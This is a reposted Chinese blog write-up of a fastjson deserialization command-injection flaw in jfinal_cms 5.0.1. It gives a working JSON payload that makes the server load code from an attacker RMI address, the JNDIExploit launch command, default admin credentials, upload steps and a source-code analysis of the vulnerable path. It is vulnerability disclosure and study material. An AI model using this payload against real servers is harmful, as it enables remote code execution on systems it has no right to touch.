文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

Jfinal CMS命令注入漏洞

2023-09-05 13:36

关注

漏洞环境

jfinal_cms 5.0.1 中存在命令执行漏洞

JDK 版本要求:

jfinal_cms版本:5.0.1
fastjson版本:1.2.28

漏洞复用

测试中使用的JDK版本:JDK8u101

在 kali 上运行该工具,启动 rmi 和 ldap 服务
https://github.com/feihong-cs/JNDIExploit

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe"

2022-11-17T12:30:22.png
替换payload中的rmi或ldap地址,然后保存到config.json

{    "a":{        "@type":"java.lang.Class",        "val":"com.sun.rowset.JdbcRowSetImpl"    },    "b":{        "@type":"com.sun.rowset.JdbcRowSetImpl",        "dataSourceName":"rmi://192.168.248.128:1099/6dxg2x",        "autoCommit":true    }}

登录后台,找到模板管理,后台默认账号密码admin/admin123456
2022-11-17T12:33:58.png
找到config.json并点击,之后点replace file
2022-11-17T12:35:10.png
把刚才做好的payload上传
2022-11-17T12:35:33.png
访问 /ueditor,就会执行命令并弹出计算器

http://localhost:8080/jfinal_cms/ueditor

136699966-b0b2294c-cdf1-4145-9340-cc0885a7e73d.gif
利用成功,散会!

漏洞分析

com.jflyfox.component.controller.Ueditor
ActionEnter类在/ueditor路由的index方法中实例化
2022-11-17T12:38:14.png
com.baidu.ueditor.ActionEnter

ActionEnter类的构造方法中实例化
2022-11-17T12:39:52.png

com.baidu.ueditor.ConfigManager

ConfigManager调用的构造方法initEnv()
2022-11-17T12:40:25.png

com.baidu.ueditor.ConfigManager

initEnv调用JSONObject.parseObject来解析文件内容,这里的文件内容是可控的,只需将文件内容替换为payload即可
2022-11-17T12:41:17.png

com.baidu.ueditor.ConfigManager

如果后台存在任何文件上传漏洞,则可以将此文件替换为包含payload的文件,以触发 fastjson 反序列化WEB-INF/classes/config.json
2022-11-17T12:42:01.png
2022-11-17T12:42:09.png

来源地址:https://blog.csdn.net/MoLeft/article/details/128393531

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯